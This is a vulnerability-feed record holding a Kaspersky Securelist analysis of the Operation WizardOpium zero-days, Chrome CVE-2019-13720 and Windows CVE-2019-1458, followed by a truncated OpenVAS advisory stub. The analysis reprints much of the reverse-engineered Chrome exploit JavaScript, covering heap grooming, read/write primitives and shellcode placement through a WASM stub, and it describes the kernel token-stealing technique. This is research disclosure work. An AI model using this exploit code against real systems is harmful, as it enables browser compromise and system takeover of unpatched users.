{"securelist": [{"lastseen": "2020-05-28T11:50:22", "bulletinFamily": "blog", "description": "\n\nBack in October 2019 we detected a classic watering-hole attack on a North Korea-related news site that exploited a chain of Google Chrome and Microsoft Windows zero-days. While we've already published blog posts briefly describing this operation (available [here](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), in this blog post we'd like to take a deep technical dive into the exploits and vulnerabilities used in this attack.\n\n## Google Chrome remote code execution exploit\n\nIn the [original blog post](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) we described the exploit loader responsible for initial validation of the target and execution of the next stage JavaScript code containing the full browser exploit. The exploit is huge because, besides code, it contains byte arrays with shellcode, a Portable Executable (PE) file and WebAssembly (WASM) module used in the later stages of exploitation. The exploit abused a vulnerability in the WebAudio OfflineAudioContext interface and was targeting two release builds of Google Chrome 76.0.3809.87 and 77.0.3865.75. However, the vulnerability was introduced long before that and much earlier releases with a WebAudio component are also vulnerable. At the time of our discovery the current version of Google Chrome was 78, and while this version was also affected, the exploit did not support it and had a number of checks to ensure that it would only be executed on affected versions to prevent crashes. After our report, the vulnerability was assigned CVE-2019-13720 and was fixed in version 78.0.3904.87 with the following [commit](<https://chromium.googlesource.com/chromium/src.git/+/6a2e670a243b815cf043f8da4d26ecb9a64d307b>). A use-after-free (UAF) vulnerability, it could be triggered due to a race condition between the Render and Audio threads:\n \n \n if (!buffer) {\n +\tBaseAudioContext::GraphAutoLocker context_locker(Context());\n +\tMutexLocker locker(process_lock_);\n \treverb_.reset();\n \tshared_buffer_ = nullptr;\n \treturn;\n\nAs you can see, when the audio buffer is set to null in ConvolverNode and an active buffer already exists within the Reverb object, the function SetBuffer() can destroy reverb_ and shared_buffer_ objects.\n \n \n class MODULES_EXPORT ConvolverHandler final : public AudioHandler {\n ...\n std::unique_ptr<Reverb> reverb_;\n std::unique_ptr<SharedAudioBuffer> shared_buffer_;\n ...\n\nThese objects might still be in use by the Render thread because there is no proper synchronization between the two threads in the code. A patch added two missing locks (graph lock and process lock) for when the buffer is nullified.\n\nThe exploit code was obfuscated, but we were able to fully reverse engineer it and reveal all the small details. By looking at the code, we can see the author of the exploit has excellent knowledge of the internals of specific Google Chrome components, especially the [PartitionAlloc](<https://github.com/scrapy/base-chromium/blob/master/allocator/partition_allocator/PartitionAlloc.md>) memory allocator. This can clearly be seen from the snippets of reverse engineered code below. These functions are used in the exploit to retrieve useful information from internal structures of the allocator, including: SuperPage address, PartitionPage address by index inside the SuperPage, the index of the used PartitionPage and the address of PartitionPage metadata. All constants are taken from [partition_alloc_constants.h](<https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/partition_alloc_constants.h>):\n \n \n function getSuperPageBase(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet superPageBaseMask = ~superPageOffsetMask;\n \tlet superPageBase = addr & superPageBaseMask;\n \treturn superPageBase;\n }\n \n function getPartitionPageBaseWithinSuperPage(addr, partitionPageIndex) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet partitionPageBase = partitionPageIndex << BigInt(14);\n \tlet finalAddr = superPageBase + partitionPageBase;\n \treturn finalAddr;\n }\n \n function getPartitionPageIndex(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \treturn partitionPageIndex;\n }\n \n function getMetadataAreaBaseFromPartitionSuperPage(addr) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet systemPageSize = BigInt(0x1000);\n \treturn superPageBase + systemPageSize;\n }\n \n function getPartitionPageMetadataArea(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \tlet pageMetadataSize = BigInt(0x20);\n \tlet partitionPageMetadataPtr = getMetadataAreaBaseFromPartitionSuperPage(addr) + partitionPageIndex * pageMetadataSize;\n \treturn partitionPageMetadataPtr;\n }\n\nIt's interesting that the exploit also uses the relatively new built-in [BigInt](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/BigInt>) class to handle 64-bit values; authors usually use their own primitives in exploits.\n\nAt first, the code initiates OfflineAudioContext and creates a huge number of IIRFilterNode objects that are initialized via two float arrays.\n \n \n let gcPreventer = [];\n let iirFilters = [];\n \n function initialSetup() {\n \tlet audioCtx = new OfflineAudioContext(1, 20, 3000);\n \n \tlet feedForward = new Float64Array(2);\n \tlet feedback = new Float64Array(1);\n \n \tfeedback[0] = 1;\n \tfeedForward[0] = 0;\n \tfeedForward[1] = -1;\n \n \tfor (let i = 0; i < 256; i++)\n iirFilters.push(audioCtx.createIIRFilter(feedForward, feedback));\n }\n\nAfter that, the exploit begins the initial stage of exploitation and tries to trigger a UAF bug. For that to work the exploit creates the objects that are needed for the Reverb component. It creates another huge OfflineAudioContext object and two ConvolverNode objects \u2013 ScriptProcessorNode to start audio processing and AudioBuffer for the audio channel.\n \n \n async function triggerUaF(doneCb) {\n \tlet audioCtx = new OfflineAudioContext(2, 0x400000, 48000);\n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \tlet scriptNode = audioCtx.createScriptProcessor(0x4000, 1, 1);\n \tlet channelBuffer = audioCtx.createBuffer(1, 1, 48000);\n \n \tconvolver.buffer = channelBuffer;\n \tbufferSource.buffer = channelBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tchannelBuffer.getChannelData(0).fill(0);\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(scriptNode);\n \tscriptNode.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \tscriptNode.onaudioprocess = function(evt) {\n \t\tlet channelDataArray = new Uint32Array(evt.inputBuffer.getChannelData(0).buffer);\n \n \t\tfor (let j = 0; j < channelDataArray.length; j++) {\n \t\tif (j + 1 < channelDataArray.length && channelDataArray[j] != 0 && channelDataArray[j + 1] != 0) {\n \t\t\tlet u64Array = new BigUint64Array(1);\n \t\t\tlet u32Array = new Uint32Array(u64Array.buffer);\n \t\t\tu32Array[0] = channelDataArray[j + 0];\n \t\t\tu32Array[1] = channelDataArray[j + 1];\n \n \t\t\tlet leakedAddr = byteSwapBigInt(u64Array[0]);\n \t\t\tif (leakedAddr >> BigInt(32) > BigInt(0x8000))\n \t\t\tleakedAddr -= BigInt(0x800000000000);\n \t\t\tlet superPageBase = getSuperPageBase(leakedAddr);\n \n \t \t\tif (superPageBase > BigInt(0xFFFFFFFF) && superPageBase < BigInt(0xFFFFFFFFFFFF)) {\n \t\t\tfinished = true;\n \t\t\tevt = null;\n \n \t\t\tbufferSource.disconnect();\n \t\t\tscriptNode.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\tsetTimeout(function() {\n \t\t\tdoneCb(leakedAddr);\n \t\t\t}, 1);\n \n \t\t\treturn;\n \t\t\t}\n \t\t}\n \t\t}\n \t};\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (!finished) {\n \t \tfinished = true;\n \t \ttriggerUaF(doneCb);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tconvolver.buffer = null;\n \t\tconvolver.buffer = channelBuffer;\n \t\tawait later(100); // wait 100 millseconds\n \t}\n };\n\nThis function is executed recursively. It fills the audio channel buffer with zeros, starts rendering offline and at the same time runs a loop that nullifies and resets the channel buffer of the ConvolverNode object and tries to trigger a bug. The exploit uses the later() function to simulate the Sleep function, suspend the current thread and let the Render and Audio threads finish execution right on time:\n \n \n function later(delay) {\n \treturn new Promise(resolve => setTimeout(resolve, delay));\n }\n\nDuring execution the exploit checks if the audio channel buffer contains any data that differs from the previously set zeroes. The existence of such data would mean the UAF was triggered successfully and at this stage the audio channel buffer should contain a leaked pointer.\n\nThe PartitionAlloc memory allocator has a special exploit mitigation that works as follows: when the memory region is freed, it byteswaps the address of the pointer and after that the byteswapped address is added to the FreeList structure. This complicates exploitation because the attempt to dereference such a pointer will crash the process. To bypass this technique the exploit uses the following primitive that simply swaps the pointer back:\n \n \n function byteSwapBigInt(x) {\n \tlet result = BigInt(0);\n \tlet tmp = x;\n \n \tfor (let i = 0; i < 8; i++) {\n \t\tresult = result << BigInt(8);\n \t\tresult += tmp & BigInt(0xFF);\n \t\ttmp = tmp >> BigInt(8);\n \t}\n \n \treturn result;\n }\n\nThe exploit uses the leaked pointer to get the address of the SuperPage structure and verifies it. If everything goes to plan, then it should be a raw pointer to a temporary_buffer_ object of the ReverbConvolverStage class that is passed to the callback function _initialUAFCallback_.\n \n \n let sharedAudioCtx;\n let iirFilterFeedforwardAllocationPtr;\n \n function initialUAFCallback(addr) {\n \tsharedAudioCtx = new OfflineAudioContext(1, 1, 3000);\n \n \tlet partitionPageIndexDelta = undefined;\n \tswitch (majorVersion) {\n \t\tcase 77: // 77.0.3865.75\n \t \tpartitionPageIndexDelta = BigInt(-26);\n \tbreak;\n \t\tcase 76: // 76.0.3809.87\n \t\tpartitionPageIndexDelta = BigInt(-25);\n \t \tbreak;\n \t}\n \n \tiirFilterFeedforwardAllocationPtr = getPartitionPageBaseWithinSuperPage(addr, getPartitionPageIndex(addr) + partitionPageIndexDelta) + BigInt(0xFF0);\n \n triggerSecondUAF(byteSwapBigInt(iirFilterFeedforwardAllocationPtr), finalUAFCallback);\n }\n\nThe exploit uses the leaked pointer to get the address of the raw pointer to the _feedforward__ array with the AudioArray<double> type that is present in the IIRProcessor object created with IIRFilterNode. This array should be located in the same SuperPage, but in different versions of Chrome this object is created in different PartitionPages and there is a special code inside initialUAFCallback to handle that.\n\nThe vulnerability is actually triggered not once but twice. After the address of the right object is acquired, the vulnerability is exploited again. This time the exploit uses two AudioBuffer objects of different sizes, and the previously retrieved address is sprayed inside the larger AudioBuffer. This function also executes recursively.\n \n \n let floatArray = new Float32Array(10);\n let audioBufferArray1 = [];\n let audioBufferArray2 = [];\n let imageDataArray = [];\n \n async function triggerSecondUAF(addr, doneCb) {\n \tlet counter = 0;\n \tlet numChannels = 1;\n \n \tlet audioCtx = new OfflineAudioContext(1, 0x100000, 48000);\n \n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \n \tlet bigAudioBuffer = audioCtx.createBuffer(numChannels, 0x100, 48000);\n \tlet smallAudioBuffer = audioCtx.createBuffer(numChannels, 0x2, 48000);\n \n \tsmallAudioBuffer.getChannelData(0).fill(0);\n \n \tfor (let i = 0; i < numChannels; i++) {\n \t\tlet channelDataArray = new BigUint64Array(bigAudioBuffer.getChannelData(i).buffer);\n \t\tchannelDataArray[0] = addr;\n \t}\n \n \tbufferSource.buffer = bigAudioBuffer;\n \tconvolver.buffer = smallAudioBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (finished) {\n \t\taudioCtx = null;\n \n \t\tsetTimeout(doneCb, 200);\n \t\treturn;\n \t\t} else {\n \t\tfinished = true;\n \n \t\tsetTimeout(function() {\n \t\ttriggerSecondUAF(addr, doneCb);\n \t\t}, 1);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tcounter++;\n \n \t\tconvolver.buffer = null;\n \n \t\tawait later(1); // wait 1 millisecond\n \n \t\tif (finished)\n \t\tbreak;\n \n \t\tfor (let i = 0; i < iirFilters.length; i++) {\n \t\tfloatArray.fill(0);\n \t iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\t\tfinished = true;\n \n \t \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \n \t\t\tbufferSource.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\treturn;\n \t\t}\n \t\t}\n \n \t\tconvolver.buffer = smallAudioBuffer;\n \n \t\tawait later(1); // wait 1 millisecond\n \t}\n }\n\nThis time the exploit uses the function _getFrequencyResponse()_ to check if exploitation was successful. The function creates an array of frequencies that is filled with a Nyquist filter and the source array for the operation is filled with zeroes.\n \n \n void IIRDSPKernel::GetFrequencyResponse(int n_frequencies,\n \tconst float* frequency_hz,\n \tfloat* mag_response,\n \tfloat* phase_response) {\n ...\n Vector<float> frequency(n_frequencies);\n double nyquist = this->Nyquist();\n // Convert from frequency in Hz to normalized frequency (0 -> 1),\n // with 1 equal to the Nyquist frequency.\n for (int k = 0; k < n_frequencies; ++k)\n \tfrequency[k] = frequency_hz[k] / nyquist;\n ...\n\nIf the resulting array contains a value other than **\u03c0****, **it means exploitation was successful. If that's the case, the exploit stops its recursion and executes the function _finalUAFCallback_ to allocate the audio channel buffer again and reclaim the previously freed memory. This function also repairs the heap to prevent possible crashes by allocating various objects of different sizes and performing defragmentation of the heap. The exploit also creates BigUint64Array, which is used later to create an arbitrary read/write primitive.\n \n \n async function finalUAFCallback() {\n \tfor (let i = 0; i < 256; i++) {\n \t\tfloatArray.fill(0);\n \n \tiirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\tawait collectGargabe();\n \n \t\taudioBufferArray2 = [];\n \n \t\tfor (let j = 0; j < 80; j++)\n \t\taudioBufferArray1.push(sharedAudioCtx.createBuffer(1, 2, 10000));\n \n \t\tiirFilters = new Array(1);\n \t \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < 336; j++)\n \t\t\timageDataArray.push(new ImageData(1, 2));\n \t\timageDataArray = new Array(10);\n \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < audioBufferArray1.length; j++) {\n \t\t\tlet auxArray = new BigUint64Array(audioBufferArray1[j].getChannelData(0).buffer);\n \t\t\tif (auxArray[0] != BigInt(0)) {\n \t\t\tkickPayload(auxArray);\n \t\t\treturn;\n \t\t\t}\n \t\t}\n \n \t\treturn;\n \t\t}\n \t}\n }\n\nHeap defragmentation is performed with multiple calls to the improvised _collectGarbage_ function that creates a huge ArrayBuffer in a loop.\n \n \n function collectGargabe() {\n \tlet promise = new Promise(function(cb) {\n \t\tlet arg;\n \t\tfor (let i = 0; i < 400; i++)\n \t\tnew ArrayBuffer(1024 * 1024 * 60).buffer;\n \t\tcb(arg);\n \t});\n \treturn promise;\n }\n\nAfter those steps, the exploit executes the function _kickPayload()_ passing the previously created BigUint64Array containing the raw pointer address of the previously freed AudioArray's data.\n \n \n async function kickPayload(auxArray) {\n \tlet audioCtx = new OfflineAudioContext(1, 1, 3000);\n \tlet partitionPagePtr = getPartitionPageMetadataArea(byteSwapBigInt(auxArray[0]));\n \tauxArray[0] = byteSwapBigInt(partitionPagePtr);\n \tlet i = 0;\n \tdo {\n \t\tgcPreventer.push(new ArrayBuffer(8));\n \t\tif (++i > 0x100000)\n \t\treturn;\n \t} while (auxArray[0] != BigInt(0));\n \tlet freelist = new BigUint64Array(new ArrayBuffer(8));\n \tgcPreventer.push(freelist);\n \t...\n\nThe exploit manipulates the PartitionPage metadata of the freed object to achieve the following behavior. If the address of another object is written in BigUint64Array at index zero and if a new 8-byte object is created and the value located at index 0 is read back, then a value located at the previously set address will be read. If something is written at index 0 at this stage, then this value will be written to the previously set address instead.\n \n \n function read64(rwHelper, addr) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array;\n \ttmp.buffer;\n \tgcPreventer.push(tmp);\n \treturn byteSwapBigInt(rwHelper[0]);\n }\n \n function write64(rwHelper, addr, value) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array(1);\n \ttmp.buffer;\n \ttmp[0] = value;\n \tgcPreventer.push(tmp);\n }\n\nAfter the building of the arbitrary read/write primitives comes the final stage \u2013 executing the code. The exploit achieves this by using a popular technique that exploits the Web Assembly (WASM) functionality. Google Chrome currently allocates pages for just-in-time (JIT) compiled code with read/write/execute (RWX) privileges and this can be used to overwrite them with shellcode. At first, the exploit initiates a \"dummy\" WASM module and it results in the allocation of memory pages for JIT compiled code.\n \n \n const wasmBuffer = new Uint8Array([...]);\n const wasmBlob = new Blob([wasmBuffer], {\n \ttype: \"application/wasm\"\n });\n \n const wasmUrl = URL.createObjectURL(wasmBlob);\n var wasmFuncA = undefined;\n WebAssembly.instantiateStreaming(fetch(wasmUrl), {}).then(function(result) {\n \twasmFuncA = result.instance.exports.a;\n });\n\nTo execute the exported function _wasmFuncA_, the exploit creates a FileReader object. When this object is initiated with data it creates a FileReaderLoader object internally. If you can parse PartitionAlloc allocator structures and know the size of the next object that will be allocated, you can predict which address it will be allocated to. The exploit uses the _getPartitionPageFreeListHeadEntryBySlotSize()_ function with the provided size and gets the address of the next free block that will be allocated by FileReaderLoader.\n \n \n let fileReader = new FileReader;\n let fileReaderLoaderSize = 0x140;\n let fileReaderLoaderPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (!fileReaderLoaderPtr)\n \treturn;\n \n fileReader.readAsArrayBuffer(new Blob([]));\n \n let fileReaderLoaderTestPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (fileReaderLoaderPtr == fileReaderLoaderTestPtr)\n \treturn;\n\nThe exploit obtains this address twice to find out if the FileReaderLoader object was created and if the exploit can continue execution. The exploit sets the exported WASM function to be a callback for a FileReader event (in this case, an onerror callback) and because the FileReader type is derived from EventTargetWithInlineData, it can be used to get the addresses of all its events and the address of the JIT compiled exported WASM function.\n \n \n fileReader.onerror = wasmFuncA;\n \n let fileReaderPtr = read64(freelist, fileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);\n \n let vectorPtr = read64(freelist, fileReaderPtr + BigInt(0x28));\n let registeredEventListenerPtr = read64(freelist, vectorPtr);\n let eventListenerPtr = read64(freelist, registeredEventListenerPtr);\n let eventHandlerPtr = read64(freelist, eventListenerPtr + BigInt(0x8));\n let jsFunctionObjPtr = read64(freelist, eventHandlerPtr + BigInt(0x8));\n \n let jsFunctionPtr = read64(freelist, jsFunctionObjPtr) - BigInt(1);\n let sharedFuncInfoPtr = read64(freelist, jsFunctionPtr + BigInt(0x18)) - BigInt(1);\n let wasmExportedFunctionDataPtr = read64(freelist, sharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);\n let wasmInstancePtr = read64(freelist, wasmExportedFunctionDataPtr + BigInt(0x10)) - BigInt(1);\n \n let stubAddrFieldOffset = undefined;\n switch (majorVersion) {\n \tcase 77:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(16);\n \tbreak;\n \tcase 76:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(17);\n \tbreak\n }\n \n let stubAddr = read64(freelist, wasmInstancePtr + stubAddrFieldOffset);\n\nThe variable stubAddr contains the address of the page with the stub code that jumps to the JIT compiled WASM function. At this stage it's sufficient to overwrite it with shellcode. To do so, the exploit uses the function _getPartitionPageFreeListHeadEntryBySlotSize()_ again to find the next free block of 0x20 bytes, which is the size of the structure for the ArrayBuffer object. This object is created when the exploit creates a new audio buffer.\n \n \n let arrayBufferSize = 0x20;\n let arrayBufferPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, arrayBufferSize);\n if (!arrayBufferPtr)\n \treturn;\n \n let audioBuffer = audioCtx.createBuffer(1, 0x400, 6000);\n gcPreventer.push(audioBuffer);\n\nThe exploit uses arbitrary read/write primitives to get the address of the DataHolder class that contains the raw pointer to the data and size of the audio buffer. The exploit overwrites this pointer with stubAddr and sets a huge size.\n \n \n let dataHolderPtr = read64(freelist, arrayBufferPtr + BigInt(0x8));\n \n write64(freelist, dataHolderPtr + BigInt(0x8), stubAddr);\n write64(freelist, dataHolderPtr + BigInt(0x10), BigInt(0xFFFFFFF));\n\nNow all that's needed is to implant a Uint8Array object into the memory of this audio buffer and place shellcode there along with the Portable Executable that will be executed by the shellcode.\n \n \n let payloadArray = new Uint8Array(audioBuffer.getChannelData(0).buffer);\n payloadArray.set(shellcode, 0);\n payloadArray.set(peBinary, shellcode.length);\n\nTo prevent the possibility of a crash the exploit clears the pointer to the top of the FreeList structure used by the PartitionPage.\n \n \n write64(freelist, partitionPagePtr, BigInt(0));\n\nNow, in order to execute the shellcode, it's enough to call the exported WASM function.\n \n \n try {\n \twasmFuncA();\n } catch (e) {}\n\n## Microsoft Windows elevation of privilege exploit\n\nThe shellcode appeared to be a Reflective PE loader for the Portable Executable module that was also present in the exploit. This module mostly consisted of the code to escape Google Chrome's sandbox by exploiting the Windows kernel component win32k for the elevation of privileges and it was also responsible for downloading and executing the actual malware. On closer analysis, we found that the exploited vulnerability was in fact a zero-day. We notified Microsoft Security Response Center and they assigned it CVE-2019-1458 and fixed the vulnerability. The win32k component has something of bad reputation. It has been present since Windows NT 4.0 and, according to Microsoft, it is responsible for more than 50% of all kernel security bugs. In the last two years alone Kaspersky has found five zero-days in the wild that exploited win32k vulnerabilities. That's quite an interesting statistic considering that since the release of Windows 10, Microsoft has implemented a number of mitigations aimed at complicating exploitation of win32k vulnerabilities and the majority of zero-days that we found exploited versions of Microsoft Windows prior to the release of Windows 10 RS4. The elevation of privilege exploit used in Operation WizardOpium was built to support Windows 7, Windows 10 build 10240 and Windows 10 build 14393. It's also important to note that Google Chrome has a special security feature called [Win32k lockdown](<https://googleprojectzero.blogspot.com/2016/11/breaking-chain.html>) developed and supported by James Forshaw of Google Project Zero. This security feature eliminates the whole win32k attack surface by disabling access to win32k syscalls from inside Chrome processes. Unfortunately, Win32k lockdown is only supported on machines running Windows 10. So, it's fair to assume that Operation WizardOpium targeted users running Windows 7.\n\nCVE-2019-1458 is an Arbitrary Pointer Dereference vulnerability. In win32k Window objects are represented by a tagWND structure. There are also a number of classes based on this structure: ScrollBar, Menu, Listbox, Switch and many others. The FNID field of tagWND structure is used to distinguish the type of class. Different classes also have various extra data appended to the tagWND structure. This extra data is basically just different structures that often include kernel pointers. Besides that, in the win32k component there's a syscall SetWindowLongPtr that can be used to set this extra data (after validation of course). It's worth noting that SetWindowLongPtr was related to a number of vulnerabilities in the past (e.g., CVE-2010-2744, CVE-2016-7255, and CVE-2019-0859). There's a [common issue](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>) when pre-initialized extra data can lead to system procedures incorrectly handling. In the case of CVE-2019-1458, the validation performed by SetWindowLongPtr was just insufficient.\n \n \n xxxSetWindowLongPtr(tagWND *pwnd, int index, QWORD data, ...)\n \t...\n \tif ( (int)index >= gpsi->mpFnid_serverCBWndProc[(pwnd->fnid & 0x3FFF) - 0x29A] - sizeof(tagWND) )\n \t\t...\n \t\textraData = (BYTE*)tagWND + sizeof(tagWND) + index\n \t\told = *(QWORD*)extraData;\n \t\t*(QWORD*)extraData = data;\n \t\treturn old;\n\nA check for the index parameter would have prevented this bug, but prior to the patch the values for FNID_DESKTOP, FNID_SWITCH, FNID_TOOLTIPS inside the mpFnid_serverCBWndProc table were not initialized, rendering this check useless and allowing the kernel pointers inside the extra data to be overwritten.\n\nTriggering the bug is quite simple: at first, you create a Window, then NtUserMessageCall can be used to call any system class window procedure.\n \n \n gpsi->mpFnidPfn[(dwType + 6) & 0x1F]((tagWND *)wnd, msg, wParam, lParam, resultInfo);\n\nIt's important to provide the right message and dwType parameters. The message needs to be equal to WM_CREATE. dwType is converted to fnIndex internally with the following calculation: (dwType + 6) & 0x1F. The exploit uses a dwType equal to 0xE0. It results in an fnIndex equal to 6 which is the function index of _xxxSwitchWndProc _and the WM_CREATE message sets the FNID field to be equal to FNID_SWITCH.\n \n \n LRESULT xxxSwitchWndProc(tagWND *wnd, UINT msg, WPARAM wParam, LPARAM lParam)\n {\n ...\n pti = *(tagTHREADINFO **)&gptiCurrent;\n if ( wnd->fnid != FNID_SWITCH )\n {\n if ( wnd->fnid || wnd->cbwndExtra + 296 < (unsigned int)gpsi->mpFnid_serverCBWndProc[6] )\n return 0i64;\n if ( msg != 1 )\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n if ( wnd[1].head.h )\n return 0i64;\n wnd->fnid = FNID_SWITCH;\n }\n switch ( msg )\n {\n case WM_CREATE:\n zzzSetCursor(wnd->pcls->spcur, pti, 0i64);\n break;\n case WM_CLOSE:\n xxxSetWindowPos(wnd, 0, 0);\n xxxCancelCoolSwitch();\n break;\n case WM_ERASEBKGND:\n case WM_FULLSCREEN:\n pti->ptl = (_TL *)&pti->ptl;\n ++wnd->head.cLockObj;\n xxxPaintSwitchWindow(wnd, pti, 0i64);\n ThreadUnlock1();\n return 0i64;\n }\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n }\n\nThe vulnerability in _NtUserSetWindowLongPtr_ can then be used to overwrite the extra data at index zero, which happens to be a pointer to a structure containing information about the Switch Window. In other words, the vulnerability makes it possible to set some arbitrary kernel pointer that will be treated as this structure.\n\nAt this stage it's enough to call _NtUserMessageCall_ again, but this time with a message equal to WM_ERASEBKGND. This results in the execution of the function _xxxPaintSwitchWindow_ that increments and decrements a couple of integers located by the pointer that we previously set.\n \n \n sub [rdi+60h], ebx\n add [rdi+68h], ebx\n ...\n sub [rdi+5Ch], ecx\n add [rdi+64h], ecx\n\nAn important condition for triggering the exploitable code path is that the ALT key needs to be pressed.\n\nExploitation is performed by abusing Bitmaps. For successful exploitation a few Bitmaps need to be allocated next to each other, and their kernel addresses need to be known. To achieve this, the exploit uses two common kernel ASLR bypass techniques. For Windows 7 and Windows 10 build 10240 (Threshold 1) the Bitmap kernel addresses are leaked via the GdiSharedHandleTable [technique](<https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives>): in older versions of the OS there is a special table available in the user level that holds the kernel addresses of all GDI objects present in the process. This particular technique was patched in Windows 10 build 14393 (Redstone 1), so for this version the exploit uses another common [technique](<https://labs.f-secure.com/archive/a-tale-of-bitmaps/>) that abuses Accelerator Tables (patched in Redstone 2). It involves creating a Create Accelerator Table object, leaking its kernel address from the gSharedInfo HandleTable available in the user level, and then freeing the Accelerator Table object and allocating a Bitmap reusing the same memory address.\n\nThe whole exploitation process works as follows: the exploit creates three bitmaps located next to each other and their addresses are leaked. The exploit prepares Switch Window and uses a vulnerability in NtUserSetWindowLongPtr to set an address pointing near the end of the first Bitmap as Switch Window extra data. Bitmaps are represented by a SURFOBJ structure and the previously set address needs to be calculated in a way that will make the xxxPaintSwitchWindow function increment the sizlBitmap field of the SURFOBJ structure for the Bitmap allocated next to the first one. The sizlBitmap field indicates the bounds of the pixel data buffer and the incremented value will allow the use of the function SetBitmapBits() to perform an out-of-bounds write and overwrite the SURFOBJ of the third Bitmap object.\n\nThe pvScan0 field of the SURFOBJ structure is an address of the pixel data buffer, so the ability to overwrite it with an arbitrary pointer results in arbitrary read/write primitives via the functions GetBitmapBits()/SetBitmapBits(). The exploit uses these primitives to parse the EPROCESS structure and steal the system token. To get the kernel address of the EPROCESS structure, the exploit uses the function [EnumDeviceDrivers](<https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumdevicedrivers>). This function works according to its MSDN description and it provides a list of kernel addresses for currently loaded drivers. The first address in the list is the address of ntkrnl and to get the offset to the EPROCESS structure the exploit parses an executable in search for the exported PsInitialSystemProcess variable.\n\nIt's worth noting that this technique still works in the latest versions of Windows (tested with Windows 10 19H1 build 18362). Stealing the system token is the most common post exploitation technique that we see in the majority of elevation of privilege exploits. After acquiring system privileges the exploit downloads and executes the actual malware.\n\n## Conclusions\n\nIt was particularly interesting for us to examine the Chrome exploit because it was the first Google Chrome in-the-wild zero-day encountered for a while. It was also interesting that it was used in combination with an elevation of privilege exploit that didn't allow exploitation on the latest versions of Windows mostly due to the Win32k lockdown security feature of Google Chrome. With regards to privilege elevation, it was also interesting that we found another 1-day exploit for this vulnerability just one week after the patch, indicating how simple it is to exploit this vulnerability.\n\n_We would like to thank the Google Chrome and Microsoft security teams for fixing these vulnerabilities so quickly. Google was generous enough to offer a bounty for CVE-2019-13720. The reward was donated to charity and Google matched the donation._", "modified": "2020-05-28T10:00:09", "published": "2020-05-28T10:00:09", "id": "SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7", "href": "https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/", "type": "securelist", "title": "The zero-day exploits of Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-05-28T13:42:39", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-05-26T00:00:00", "published": "2020-05-26T00:00:00", "id": "OPENVAS:1361412562311220201591", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201591", "title": "Huawei EulerOS: Security Advisory for ruby (EulerOS-SA-2020-1591)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed 